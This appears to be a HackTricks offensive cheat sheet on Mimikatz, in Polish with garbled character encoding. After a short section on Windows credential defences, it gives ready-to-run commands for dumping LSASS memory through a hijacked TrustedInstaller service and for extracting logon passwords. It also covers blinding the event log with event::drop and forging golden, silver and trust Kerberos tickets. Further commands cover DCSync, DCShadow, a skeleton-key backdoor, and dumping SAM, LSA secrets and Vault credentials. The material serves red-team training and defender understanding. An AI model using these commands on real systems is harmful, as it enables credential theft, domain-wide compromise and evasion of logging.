# Mimikatz
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 馃挰 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 馃惁 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
**Ta strona opiera si臋 na jednej z [adsecurity.org](https://adsecurity.org/?page\_id=1821)**. Sprawd藕 orygina艂, aby uzyska膰 wi臋cej informacji!
## LM i has艂a w postaci czystego tekstu w pami臋ci
Od Windows 8.1 i Windows Server 2012 R2 wprowadzono znacz膮ce 艣rodki w celu ochrony przed kradzie偶膮 po艣wiadcze艅:
- **Has艂a LM i has艂a w postaci czystego tekstu** nie s膮 ju偶 przechowywane w pami臋ci, aby zwi臋kszy膰 bezpiecze艅stwo. Nale偶y skonfigurowa膰 okre艣lony klucz rejestru, _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest "UseLogonCredential"_, z warto艣ci膮 DWORD `0`, aby wy艂膮czy膰 uwierzytelnianie Digest, zapewniaj膮c, 偶e has艂a w "czystym tek艣cie" nie s膮 buforowane w LSASS.
- **Ochrona LSA** zosta艂a wprowadzona, aby chroni膰 proces Local Security Authority (LSA) przed nieautoryzowanym odczytem pami臋ci i wstrzykiwaniem kodu. Osi膮ga si臋 to poprzez oznaczenie LSASS jako chronionego procesu. Aktywacja Ochrony LSA obejmuje:
1. Modyfikacj臋 rejestru w _HKEY\_LOCAL\_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa_, ustawiaj膮c `RunAsPPL` na `dword:00000001`.
2. Wdro偶enie obiektu zasad grupy (GPO), kt贸ry wymusza t臋 zmian臋 rejestru na zarz膮dzanych urz膮dzeniach.
Pomimo tych zabezpiecze艅, narz臋dzia takie jak Mimikatz mog膮 omija膰 Ochron臋 LSA, u偶ywaj膮c okre艣lonych sterownik贸w, chocia偶 takie dzia艂ania prawdopodobnie zostan膮 zarejestrowane w dziennikach zdarze艅.
### Przeciwdzia艂anie usuni臋ciu SeDebugPrivilege
Administratorzy zazwyczaj maj膮 SeDebugPrivilege, co umo偶liwia im debugowanie program贸w. To uprawnienie mo偶na ograniczy膰, aby zapobiec nieautoryzowanym zrzutom pami臋ci, co jest powszechn膮 technik膮 stosowan膮 przez atakuj膮cych do wydobywania po艣wiadcze艅 z pami臋ci. Jednak nawet po usuni臋ciu tego uprawnienia, konto TrustedInstaller nadal mo偶e wykonywa膰 zrzuty pami臋ci, u偶ywaj膮c dostosowanej konfiguracji us艂ugi:
```bash
sc config TrustedInstaller binPath= "C:\\Users\\Public\\procdump64.exe -accepteula -ma lsass.exe C:\\Users\\Public\\lsass.dmp"
sc start TrustedInstaller
```
To pozwala na zrzut pami臋ci `lsass.exe` do pliku, kt贸ry nast臋pnie mo偶na przeanalizowa膰 na innym systemie w celu wyodr臋bnienia po艣wiadcze艅:
```
# privilege::debug
# sekurlsa::minidump lsass.dmp
# sekurlsa::logonpasswords
```
## Opcje Mimikatz
Manipulacja dziennikami zdarze艅 w Mimikatz obejmuje dwa g艂贸wne dzia艂ania: czyszczenie dziennik贸w zdarze艅 i 艂atanie us艂ugi zdarze艅, aby zapobiec rejestrowaniu nowych zdarze艅. Poni偶ej znajduj膮 si臋 polecenia do wykonania tych dzia艂a艅:
#### Czyszczenie dziennik贸w zdarze艅
- **Polecenie**: To dzia艂anie ma na celu usuni臋cie dziennik贸w zdarze艅, co utrudnia 艣ledzenie z艂o艣liwych dzia艂a艅.
- Mimikatz nie zapewnia bezpo艣redniego polecenia w swojej standardowej dokumentacji do czyszczenia dziennik贸w zdarze艅 bezpo艣rednio za pomoc膮 wiersza polece艅. Jednak manipulacja dziennikami zdarze艅 zazwyczaj obejmuje u偶ycie narz臋dzi systemowych lub skrypt贸w poza Mimikatz do czyszczenia konkretnych dziennik贸w (np. u偶ywaj膮c PowerShell lub Podgl膮du zdarze艅 systemu Windows).
#### Funkcja eksperymentalna: 艁atanie us艂ugi zdarze艅
- **Polecenie**: `event::drop`
- To eksperymentalne polecenie ma na celu modyfikacj臋 zachowania us艂ugi rejestrowania zdarze艅, skutecznie zapobiegaj膮c rejestrowaniu nowych zdarze艅.
- Przyk艂ad: `mimikatz "privilege::debug" "event::drop" exit`
- Polecenie `privilege::debug` zapewnia, 偶e Mimikatz dzia艂a z niezb臋dnymi uprawnieniami do modyfikacji us艂ug systemowych.
- Polecenie `event::drop` nast臋pnie 艂ata us艂ug臋 rejestrowania zdarze艅.
### Ataki na bilety Kerberos
### Tworzenie Z艂otego Biletu
Z艂oty Bilet umo偶liwia impersonacj臋 z dost臋pem w ca艂ej domenie. Kluczowe polecenie i parametry:
- Polecenie: `kerberos::golden`
- Parametry:
- `/domain`: Nazwa domeny.
- `/sid`: Identyfikator zabezpiecze艅 (SID) domeny.
- `/user`: Nazwa u偶ytkownika do impersonacji.
- `/krbtgt`: Hash NTLM konta us艂ugi KDC domeny.
- `/ptt`: Bezpo艣rednio wstrzykuje bilet do pami臋ci.
- `/ticket`: Zapisuje bilet do p贸藕niejszego u偶ycia.
Przyk艂ad:
```bash
mimikatz "kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /krbtgt:ntlmhash /ptt" exit
```
### Tworzenie Srebrnego Biletu
Srebrne Bilety daj膮 dost臋p do konkretnych us艂ug. Kluczowe polecenie i parametry:
- Polecenie: Podobne do Z艂otego Biletu, ale celuje w konkretne us艂ugi.
- Parametry:
- `/service`: Us艂uga, kt贸r膮 nale偶y zaatakowa膰 (np. cifs, http).
- Inne parametry podobne do Z艂otego Biletu.
Przyk艂ad:
```bash
mimikatz "kerberos::golden /user:user /domain:example.com /sid:S-1-5-21-123456789-123456789-123456789 /target:service.example.com /service:cifs /rc4:ntlmhash /ptt" exit
```
### Tworzenie Zaufanego Biletu
Zaufane Bilety s膮 u偶ywane do uzyskiwania dost臋pu do zasob贸w w r贸偶nych domenach, wykorzystuj膮c relacje zaufania. Kluczowe polecenie i parametry:
- Polecenie: Podobne do Z艂otego Biletu, ale dla relacji zaufania.
- Parametry:
- `/target`: FQDN docelowej domeny.
- `/rc4`: Hash NTLM dla konta zaufania.
Przyk艂ad:
```bash
mimikatz "kerberos::golden /domain:child.example.com /sid:S-1-5-21-123456789-123456789-123456789 /sids:S-1-5-21-987654321-987654321-987654321-519 /rc4:ntlmhash /user:admin /service:krbtgt /target:parent.example.com /ptt" exit
```
### Dodatkowe polecenia Kerberos
- **Wy艣wietlanie bilet贸w**:
- Polecenie: `kerberos::list`
- Wy艣wietla wszystkie bilety Kerberos dla bie偶膮cej sesji u偶ytkownika.
- **Przeka偶 pami臋膰 podr臋czn膮**:
- Polecenie: `kerberos::ptc`
- Wstrzykuje bilety Kerberos z plik贸w pami臋ci podr臋cznej.
- Przyk艂ad: `mimikatz "kerberos::ptc /ticket:ticket.kirbi" exit`
- **Przeka偶 bilet**:
- Polecenie: `kerberos::ptt`
- Umo偶liwia u偶ycie biletu Kerberos w innej sesji.
- Przyk艂ad: `mimikatz "kerberos::ptt /ticket:ticket.kirbi" exit`
- **Wyczy艣膰 bilety**:
- Polecenie: `kerberos::purge`
- Czy艣ci wszystkie bilety Kerberos z sesji.
- Przydatne przed u偶yciem polece艅 manipulacji biletami, aby unikn膮膰 konflikt贸w.
### Manipulacja Active Directory
- **DCShadow**: Tymczasowo sprawia, 偶e maszyna dzia艂a jako DC do manipulacji obiektami AD.
- `mimikatz "lsadump::dcshadow /object:targetObject /attribute:attributeName /value:newValue" exit`
- **DCSync**: Na艣laduje DC, aby 偶膮da膰 danych o has艂ach.
- `mimikatz "lsadump::dcsync /user:targetUser /domain:targetDomain" exit`
### Dost臋p do po艣wiadcze艅
- **LSADUMP::LSA**: Ekstrahuje po艣wiadczenia z LSA.
- `mimikatz "lsadump::lsa /inject" exit`
- **LSADUMP::NetSync**: Podszywa si臋 pod DC, u偶ywaj膮c danych o ha艣le konta komputerowego.
- *Brak konkretnego polecenia dla NetSync w oryginalnym kontek艣cie.*
- **LSADUMP::SAM**: Uzyskuje dost臋p do lokalnej bazy danych SAM.
- `mimikatz "lsadump::sam" exit`
- **LSADUMP::Secrets**: Deszyfruje sekrety przechowywane w rejestrze.
- `mimikatz "lsadump::secrets" exit`
- **LSADUMP::SetNTLM**: Ustawia nowe has艂o NTLM dla u偶ytkownika.
- `mimikatz "lsadump::setntlm /user:targetUser /ntlm:newNtlmHash" exit`
- **LSADUMP::Trust**: Pobiera informacje o uwierzytelnianiu zaufania.
- `mimikatz "lsadump::trust" exit`
### R贸偶ne
- **MISC::Skeleton**: Wstrzykuje tylne wej艣cie do LSASS na DC.
- `mimikatz "privilege::debug" "misc::skeleton" exit`
### Eskalacja uprawnie艅
- **PRIVILEGE::Backup**: Uzyskuje prawa do tworzenia kopii zapasowych.
- `mimikatz "privilege::backup" exit`
- **PRIVILEGE::Debug**: Uzyskuje uprawnienia debugowania.
- `mimikatz "privilege::debug" exit`
### Zrzut po艣wiadcze艅
- **SEKURLSA::LogonPasswords**: Wy艣wietla po艣wiadczenia dla zalogowanych u偶ytkownik贸w.
- `mimikatz "sekurlsa::logonpasswords" exit`
- **SEKURLSA::Tickets**: Ekstrahuje bilety Kerberos z pami臋ci.
- `mimikatz "sekurlsa::tickets /export" exit`
### Manipulacja SID i tokenami
- **SID::add/modify**: Zmienia SID i SIDHistory.
- Dodaj: `mimikatz "sid::add /user:targetUser /sid:newSid" exit`
- Zmodyfikuj: *Brak konkretnego polecenia dla modyfikacji w oryginalnym kontek艣cie.*
- **TOKEN::Elevate**: Podszywa si臋 pod tokeny.
- `mimikatz "token::elevate /domainadmin" exit`
### Us艂ugi terminalowe
- **TS::MultiRDP**: Umo偶liwia wiele sesji RDP.
- `mimikatz "ts::multirdp" exit`
- **TS::Sessions**: Wy艣wietla sesje TS/RDP.
- *Brak konkretnego polecenia dla TS::Sessions w oryginalnym kontek艣cie.*
### Skarbiec
- Ekstrahuje has艂a z Windows Vault.
- `mimikatz "vault::cred /patch" exit`
{% hint style="success" %}
Ucz si臋 i 膰wicz Hacking AWS:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Ucz si臋 i 膰wicz Hacking GCP: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Wsparcie dla HackTricks
* Sprawd藕 [**plany subskrypcyjne**](https://github.com/sponsors/carlospolop)!
* **Do艂膮cz do** 馃挰 [**grupy Discord**](https://discord.gg/hRep4RUj7f) lub [**grupy telegram**](https://t.me/peass) lub **艣led藕** nas na **Twitterze** 馃惁 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Dziel si臋 sztuczkami hackingowymi, przesy艂aj膮c PR-y do** [**HackTricks**](https://github.com/carlospolop/hacktricks) i [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repozytori贸w na GitHubie.
{% endhint %}